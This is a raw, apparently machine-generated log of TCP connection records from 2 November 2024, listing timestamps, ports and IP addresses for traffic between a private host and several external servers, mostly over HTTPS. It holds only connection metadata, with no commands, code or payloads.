                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.559242964 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.581338882 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.581541061 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.582160950 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.583475113 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.583498955 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.583636999 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.583645105 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.585216045 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.585216045 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.585228920 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.585238934 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.587342978 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.587423086 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.587457895 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.587532997 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.587532997 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.589857101 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.589864016 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.589894056 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.589899063 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592751980 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592756033 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592813015 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592813015 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592886925 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.592890978 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593280077 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593281984 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593311071 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593313932 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593549967 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593584061 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593676090 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593805075 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.593821049 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.029206991 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.038934946 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.038934946 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.038992882 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.039030075 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.171542883 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.171576023 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.171694040 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.171701908 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.174160004 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.214730024 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.214730024 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.214754105 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.214766026 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.292782068 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.342190981 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.344651937 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.353312016 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.358844995 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.379410982 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.379437923 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.381860018 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.381866932 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.385754108 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.385801077 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.386282921 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.386296988 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.386732101 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.386789083 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387075901 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387089968 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387269020 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387286901 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387583971 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.387594938 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.390315056 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.390346050 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.390404940 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.390547991 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.390554905 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.513715029 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.513741970 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.513772011 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.513798952 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.513817072 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.515225887 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.515412092 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.515472889 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.516486883 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.516599894 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.516649008 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524272919 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524565935 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524619102 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524645090 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524673939 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.524817944 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.556925058 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.556925058 CET63848443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.556948900 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.556958914 CET4436384813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558114052 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558114052 CET63847443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558151007 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558180094 CET4436384713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558731079 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558779001 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558826923 CET63846443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.558844090 CET4436384613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.559454918 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.559473038 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.559495926 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.559509039 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.567444086 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.567466974 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.567542076 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.598673105 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.598701000 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.598764896 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.599054098 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.599069118 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.599811077 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.599842072 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.599899054 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600122929 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600135088 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600383997 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600397110 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600936890 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.600976944 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.601032019 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.601115942 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.601124048 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.034089088 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.034149885 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.034271002 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.037698030 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.037729025 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.128417015 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.128818035 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.128843069 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.129390001 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.129395008 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260437012 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260485888 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260540962 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260730028 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260746002 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260756016 CET63849443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.260761023 CET4436384913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.263858080 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.263878107 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.263928890 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.264148951 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.264156103 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.336368084 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.337074041 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.337085009 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.337939978 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.337944031 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.351195097 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.351654053 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.351677895 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.352273941 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.352277994 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.361819029 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.364305973 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.364320040 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.365016937 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.365021944 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.376981974 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.379929066 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.379951954 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.380382061 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.380387068 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.385102034 CET6381380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.385359049 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390304089 CET8063856185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390364885 CET8063813185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390460014 CET6381380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390460968 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.390825987 CET6385680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.395673037 CET8063856185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464616060 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464679956 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464790106 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464833021 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464925051 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464925051 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464940071 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464956045 CET63851443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.464961052 CET4436385113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.470175028 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.470206976 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.474272013 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.478176117 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.478193998 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486008883 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486073017 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486160040 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486326933 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486344099 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486398935 CET63850443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.486403942 CET4436385013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.488421917 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.488442898 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.488611937 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.488611937 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.488631010 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.497425079 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.497474909 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.498248100 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.498248100 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.498286009 CET63853443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.498296976 CET4436385313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.499998093 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.500019073 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.502239943 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.502396107 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.502408028 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.517168045 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.521219969 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.521311998 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.521311998 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.521338940 CET63852443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.521349907 CET4436385213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.523192883 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.523222923 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.523343086 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.526264906 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.526299953 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.673966885 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.674141884 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.678164005 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.678185940 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.678524971 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.730166912 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.765531063 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.765531063 CET63854443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.765666008 CET44363854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.000076056 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.000610113 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.000622988 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.001157045 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.001161098 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.131228924 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.131252050 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.131283998 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.131352901 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.131352901 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.144901037 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.144912958 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.144944906 CET63855443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.144951105 CET4436385513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.178143978 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.178183079 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.182254076 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.183779955 CET63861443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.183793068 CET4436386113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.241918087 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.244163036 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.244174004 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.244719028 CET63857443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.244730949 CET4436385713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.253720045 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.254504919 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.254520893 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.255358934 CET63859443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.255373955 CET4436385913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.256215096 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.257935047 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.258980036 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.258996010 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.259588957 CET63860443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.259593964 CET4436386013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.259964943 CET63858443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.259987116 CET4436385813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:20.260679960 CET63858443192.168.2.413.107.246.45
